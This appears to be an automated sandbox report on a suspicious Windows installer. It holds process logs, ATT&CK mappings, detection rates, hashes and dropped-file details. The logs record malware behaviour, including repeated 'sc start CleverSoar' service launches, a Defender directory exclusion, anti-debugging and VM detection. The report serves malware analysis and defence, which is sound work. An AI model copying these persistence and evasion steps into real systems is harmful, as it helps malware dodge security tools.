Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CAE5720 cpuid 6_2_6CAE5720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_0018AB2A GetSystemTimeAsFileTime,9_2_0018AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00220090 GetVersion,9_2_00220090
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.2036424385.0000000000FF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MsMpEng.exe
MITRE ATT&CK matrix (techniques listed per tactic; digits shown before a technique name are the count badges of the original matrix, reproduced as they appear)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Service Execution; 1 Native API; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 241 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 341 Security Software Discovery; 241 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; 3 File and Directory Discovery; 45 System Information Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1579419 | Sample: #U8f6f#U4ef6#U5305#U5b89#U8... | Startdate: 22/12/2024 | Architecture: WINDOWS | Score: 80

Sample-level signatures:
  • Found driver which could be used to inject code into processes
  • PE file contains section with special chars
  • AI detected suspicious sample
  • Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Process tree (started processes, dropped files and signatures as shown in the behavior graph):
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
      dropped: #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp (PE32)
      • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
          dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
          signature: Adds a directory exclusion to Windows Defender
          • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
              dropped: #U8f6f#U4ef6#U5305...a0b#U5e8f_1.0.4.tmp (PE32)
              • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                  dropped: C:\Users\user\AppData\Local\...\update.vac (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Program Files (x86)\...\updat4.vac (PE32); 3 other files (none is malicious)
                  signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
                  • 7zr.exe
                      dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
                      • conhost.exe
                  • 7zr.exe
                      • conhost.exe
                  • cmd.exe
                      • sc.exe
                  • 2 other processes
          • powershell.exe
              signature: Loading BitLocker PowerShell Module
              • conhost.exe
              • WmiPrvSE.exe
  • cmd.exe
      • sc.exe
          • conhost.exe
              • sc.exe
                  • conhost.exe
              • sc.exe
          • conhost.exe
  • cmd.exe
      • sc.exe
          • conhost.exe
      • conhost.exe
  • 28 other processes
      • sc.exe
          • conhost.exe
      • sc.exe
          • conhost.exe
      • sc.exe
          • conhost.exe
      • 24 other processes
          • 24 other processes

Antivirus detection, sample (Source | Detection | Scanner):
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | 6% | Virustotal
  • #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | 0% | ReversingLabs

Antivirus detection, dropped files (Source | Detection | Scanner):
  • C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs
  • C:\Program Files (x86)\Windows NT\is-0C2B4.tmp | 0% | ReversingLabs
  • C:\Program Files (x86)\Windows NT\tProtect.dll | 3% | ReversingLabs
  • C:\Program Files (x86)\Windows NT\trash (copy) | 0% | ReversingLabs
  • C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | 0% | ReversingLabs
  • C:\Users\user\AppData\Local\Temp\is-C426E.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
  • C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | 0% | ReversingLabs
  • C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
  • bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | (none) | high

URLs (Name | Source | Malicious | Reputation):
  • https://aria2.github.io/Usage: | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | false | unknown
  • https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | false | high
  • https://github.com/aria2/aria2/issuesReport | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | false | high
  • http://www.metalinker.org/ | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | false | unknown
  • https://www.remobjects.com/ps | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | false | high
  • https://aria2.github.io/ | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | false | unknown
  • https://github.com/aria2/aria2/issues | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | false | high
  • https://www.innosetup.com/ | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796173002.0000000002C60000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1796644119.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1798850894.0000000000BE1000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1861362559.000000000086D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | false | high
  • http://www.metalinker.org/basic_string::_M_construct | #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1857755927.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-0C2B4.tmp.6.dr | false | unknown
                      No contacted IP infos
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1579419
                      Start date and time:2024-12-22 09:44:03 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 10m 26s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:110
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Critical Process Termination
                      Sample name:#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      renamed because original name is a hash value
                      Original Sample Name:_1.0.4.exe
                      Detection:MAL
                      Classification:mal80.evad.winEXE@126/32@0/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 74%
                      • Number of executed functions: 121
                      • Number of non-executed functions: 111
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                      • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 40.69.42.241
                      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      No simulations
                      No context
Domain context (Match: Associated Sample Name / URL | Detection | Threat Name | Context):
bg.microsoft.map.fastly.net
  • Rechnung736258.pdf.lnk | malicious | LummaC | 199.232.214.172
  • Company Information.pdf.lnk | malicious | Unknown | 199.232.210.172
  • Navan - Itinerary.pdf.scr.exe | malicious | LummaC | 199.232.210.172
  • HX Design.exe | malicious | Python Stealer, Blank Grabber | 199.232.210.172
  • 1734733987ee1a8345da831d1ecbca38d8a0fdc4854f6779b69f21209db7e0a6d5a2d91fd2237.dat-decoded.exe | malicious | AsyncRAT, DcRat | 199.232.210.172
  • 1734732186278e5c87d1a316617c1125acd5c32aedeebfd021b1e761647265ea7426c527bd565.dat-decoded.exe | malicious | PureLog Stealer, zgRAT | 199.232.214.172
  • Statements.pdf | malicious | WinSearchAbuse | 199.232.210.172
  • INVOICE_2279_from_RealEyes Digital LLC (1).pdf | malicious | Unknown | 199.232.214.172
  • Z8oTIWCyDE.exe | malicious | LummaC | 199.232.210.172
  • BB4S2ErvqK.exe | malicious | LummaC | 199.232.214.172
No context
No context
Dropped file context (Match: Associated Sample Name / URL | Detection | Threat Name):
C:\Program Files (x86)\Windows NT\7zr.exe
  • ekTL8jTI4D.msi | malicious | Unknown
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):831200
                        Entropy (8bit):6.671005303304742
                        Encrypted:false
                        SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                        MD5:84DC4B92D860E8AEA55D12B1E87EA108
                        SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                        SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                        SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
• Filename: ekTL8jTI4D.msi, Detection: malicious
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:data
                        Category:dropped
                        Size (bytes):249968
                        Entropy (8bit):7.999303164107087
                        Encrypted:true
                        SSDEEP:6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
                        MD5:2362DBE94C48B5F9BEC71C9C0A2AB15A
                        SHA1:B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
                        SHA-256:D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
                        SHA-512:7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
                        Malicious:false
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):5649408
                        Entropy (8bit):6.392614480390128
                        Encrypted:false
                        SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                        MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                        SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                        SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                        SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:data
                        Category:dropped
                        Size (bytes):249968
                        Entropy (8bit):7.999303164107087
                        Encrypted:true
                        SSDEEP:6144:kCH0RnlXrWzuIqJSkqQQhY1il1J4TpHQQh:d0RnlXDPqQGY1s1JuHQQh
                        MD5:2362DBE94C48B5F9BEC71C9C0A2AB15A
                        SHA1:B1A57A8FCC57D0230B5AD2CB56BBBD4DDFC9E1C9
                        SHA-256:D17B942BE633F5DE2C57DA7A62B0A788D85DCAFA6C9BA48CCBFB6FD403277288
                        SHA-512:7FC92664D53E2E5D8F624F4AF6E902B1ECD86EFF03F8192AF09FDC5899576DDA9EC8F7DC4906237207AB758EFF4142A19DA2D8622BD329A0AA7324CC307FE695
                        Malicious:false
                        Process:C:\Program Files (x86)\Windows NT\7zr.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):56530
                        Entropy (8bit):7.996846847347508
                        Encrypted:true
                        SSDEEP:1536:d3d+5x5q0iGMxg8m/iN5a2Sb+R+VgNf3Teh3k:dU5ZihSwXLRtCtk
                        MD5:406F89570AF6C412A867A8E4D82B6153
                        SHA1:8BE8D777BFB0D3FD74A143A243F87BBD647B4A0E
                        SHA-256:D5C6788AA1BA538E77DD1C26191FE9F3E9C78C080A85D903F7FD886D5ABAD25F
                        SHA-512:105181CC03B9E640164ABE7F55329F40D683540AD717501E3C5DEA283773275C3DF7D812BB888CCB10864402DB87AD1ABE9BACAC3B31C5FCF41769D769165D8A
                        Malicious:false
                        Preview:.@S.......@| ..............].!..........#Rk0cc..J...i.W.4.".....A..8c..........D..aB?....W..&....EA...z7...d_..M..%..Po..f*0n.t...IM....c.Y.D.].3W9Q...I..B..q]...'n....d%K.x..).A..l'...o..k.cR..i".X...`....R5a.....bE..U.m.U....j.(.O.a..........F"s:#Cd..SP..h1..,..X.T(...ZZ.0fn..V..:.;.....M{.GLm.o....L...sp..p...m.[.Q.....->9.m...{.UZ...p....f.;.l....G=....]....*.j.D.|yV.....2l.......^.o.|..R6.|%Hz.Xawu+..U.2.c../...C.`.O...f.......o.....5V.wB..S5..4p..2.;..q..f.Yb..d..=2.s..:....L.X..(B..F.6.am.j...P.c...*4.O.Z ...M,.!tX....=q...x.n>.C..<..8......]..".x..c.=>.l......t...(. .,......J,.Z..\.w{M..`....Z....p.6..VD..@v..G..S$K+.MLT.*eo.g.A...-.nPZ..lU9(Y....Kn..A...WvfD...*<%......8!..Q..%^"..)>XX..*A..*...$...YbE....@.C*.>.l.....;..@G._.l.-.L.x.q..n\.r_.M....YD..`x.>|....g ...J....q^.'.B@.i..0.Kq.W.........P....>.>.84.o.7z....0.8.h$b......0.D....%.*.....w..JR.7...............NJ;.......pP...|[E...4...A....x..h.T.)h+..8,G..&..k.@..y-.}..o
                        Process:C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                        File Type:7-zip archive data, version 0.4
                        Category:dropped
                        Size (bytes):56530
                        Entropy (8bit):7.996846847347513
                        Encrypted:true
                        SSDEEP:768:nJuAKIP8alGZ+u/rCpvHZIUA3xWysFN7PyhuhvbBEx7+b4TkXSycsQEnMpVb+9wm:nJuAz8rQq0vHZxO2ZMa4TxxcMpBofv
                        MD5:49B76BC1C12C1594EFAFA82A76F434A9
                        SHA1:1282B1609F0635D38D91AD3E3472FD3EAFE87703
                        SHA-256:3AEF2C31530F1EB8D4205F025C231D1B841B7D1368C1F00DDEECA329A94DAD22
                        SHA-512:09FF6AFC4E9CD9002ECCF66A02675FC5485B0D23E00B9DB5AF5BB976295DCA78D8D7C959628C4FFAE0D577A354D2B0C0E101C61A27D4C6DEACEE36DF3C8F05C6
                        Malicious:false
